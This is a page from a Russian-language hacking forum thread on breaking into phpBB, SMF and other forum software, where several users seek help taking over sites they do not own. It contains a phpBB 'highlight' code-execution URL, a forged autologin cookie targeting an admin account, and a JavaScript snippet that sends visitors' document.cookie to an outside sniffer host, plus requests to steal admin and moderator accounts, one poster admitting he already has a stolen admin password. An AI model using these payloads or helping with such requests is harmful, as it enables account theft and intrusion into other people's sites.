HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу [Задай Вопрос - Получи Ответ]
   
Ответ
Страница 9 из 32 « Первая < 5 6 7 8 9 10 11 12 13 19 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #81  
Старый 18.11.2008, 21:43
Schneider
Новичок
Регистрация: 18.11.2008
Сообщений: 1
С нами: 9198658

Репутация: 0
По умолчанию
Здраствуйте.
подскажите пожалуйста начинающему..
есть форум. 100% дырявый..
phpBB
Через чанлог выяснил что 2.0.5
через /INSTALL 2.0.6

далее не знаю чем продолжить...
1) посмотрел видео (мне кажется достаточно известное) bazaphpbb, попробовал

Код:
http://сайт/forum/viewtopic.php?t=123456&highlight=%2527.$poster=`pwd`.%2527
(где 123456 как я понимаю номер темы)
ничего не выходит.
учетной записи id2 - нет.
Но точно знаю пользователей с правами админ - это 7 и 456.
подскажите пожалуйста что можно сделать ??

HTML выключен (в подписи в том числе)

P.S. пробовал замену куков

Код:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%227%22%3B%7
после чего зашел на форум заново. куки изменились. в одной
b%3A0%3B
в другой
c66d207fa56c2bb04c041c1ef1a54589
Последний раз редактировалось Schneider; 18.11.2008 в 22:28..
 
Ответить с цитированием

  #82  
Старый 18.11.2008, 22:16
NooB MC
Новичок
Регистрация: 18.11.2008
Сообщений: 7
С нами: 9198579

Репутация: 0
По умолчанию
Цитата:
Сообщение от cash$$$  
NooB MC

А не проще зделать так?

Код:
<script language=JavaScript>
document.images[0].src="http://sniff/sniff?"+document.cookie
</script>
Составил такой документ

<html>
<head>
<title> proverka </title>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
</head>
<body>
<script language="JavaScript">
document.images[0].src="http://na-s.ru/images/***********_1.gif?"+document.cookie;
</script>
</body>

Но к сожалению ничего не выходит.
(при использовании этого совета картинка должна
быть видимой или нет?)
</html>
 
Ответить с цитированием

  #83  
Старый 19.11.2008, 15:22
NooB MC
Новичок
Регистрация: 18.11.2008
Сообщений: 7
С нами: 9198579

Репутация: 0
По умолчанию
Посоветуйте ещё что нибудь, очень сильно надо.
 
Ответить с цитированием

  #84  
Старый 20.11.2008, 00:00
overmouse
Новичок
Регистрация: 19.11.2008
Сообщений: 2
С нами: 9196988

Репутация: 0
По умолчанию
Господа! Есть smf 1.1.3, вероятней всего без заплаток за последние полгода.
Нужно: выудить пасс админа.
Пробовал заэксплойтить, однако экспы пробовал только через perl, большинство где-то стопорилось.
Один прошел: SMF <= 1.1.4 SQL Injection Exploit, но выдал сообщение о "неуязвимости" форума.
Заливка шелла по описанным тут http://forum.antichat.ru/thread43633.html способам невозможна: нет доступа к админке, на форуме прикрыто выкладывание файлов.
Что и как ещё можно сделать? очень хочется пробиться туда?
Хелп?
 
Ответить с цитированием

  #85  
Старый 20.11.2008, 00:06
FraiDex
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
С нами: 10475029

Репутация: 135
По умолчанию
Цитата:
Есть smf 1.1.3, вероятней всего без заплаток за последние полгода.
А чё ты так решил? Может всё последнии заплатки установлены и не факт, что там именно 1.1.3 написать в копирайтах можно что угодно. Поищи дыры в движке самого сайта.
 
Ответить с цитированием

  #86  
Старый 20.11.2008, 00:13
overmouse
Новичок
Регистрация: 19.11.2008
Сообщений: 2
С нами: 9196988

Репутация: 0
По умолчанию
Цитата:
Сообщение от FraiDex  
А чё ты так решил? Может всё последнии заплатки установлены и не факт, что там именно 1.1.3 написать в копирайтах можно что угодно. Поищи дыры в движке самого сайта.
Знаю владельцев форума лично просто. Админа как такового там нет.

Проблема в том что я все эти вещи, описанные постом выше сегодня вижу первый раз и, честно говоря, мне немного сложно осознать что, к чему, куда и зачем.
 
Ответить с цитированием

  #87  
Старый 20.11.2008, 19:00
psihos
Новичок
Регистрация: 25.12.2006
Сообщений: 2
С нами: 10198051

Репутация: 0
По умолчанию
--------------------------------------------------------------------------------

Вообщем, прошу помочь со взломом форума.
Похоже это та же borda.
требуется повысить себе права для чтения закрытой ветки. Ну или увести ак модера.

От вас жду ссылок или советов
 
Ответить с цитированием

  #88  
Старый 22.11.2008, 15:01
skiff18
Познающий
Регистрация: 12.01.2007
Сообщений: 35
С нами: 10171894

Репутация: 6
По умолчанию
Помогите плизз... кароче у меня есть форум есть админ ну на форуме стоит проверка на IP пишет что с своего аипи я не могу заити ! что мне здлелать чтоб попасть в админку
 
Ответить с цитированием

  #89  
Старый 22.11.2008, 15:05
sa~
Постоянный
Регистрация: 18.08.2007
Сообщений: 846
С нами: 9858933

Репутация: 1236


По умолчанию
Цитата:
Сообщение от skiff18  
Помогите плизз... кароче у меня есть форум есть админ ну на форуме стоит проверка на IP пишет что с своего аипи я не могу заити ! что мне здлелать чтоб попасть в админку
непойму... форум твой? у тебя есть доступ к фтп? если он твой в чём же проблема? измени доступ к админке на свой ip и вообще юзай поиск
 
Ответить с цитированием

  #90  
Старый 22.11.2008, 15:13
skiff18
Познающий
Регистрация: 12.01.2007
Сообщений: 35
С нами: 10171894

Репутация: 6
По умолчанию
форум не мои просто достал пасс админа а заити не могу
 
Ответить с цитированием
Ответ
Страница 9 из 32 « Первая < 5 6 7 8 9 10 11 12 13 19 > Последняя »



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.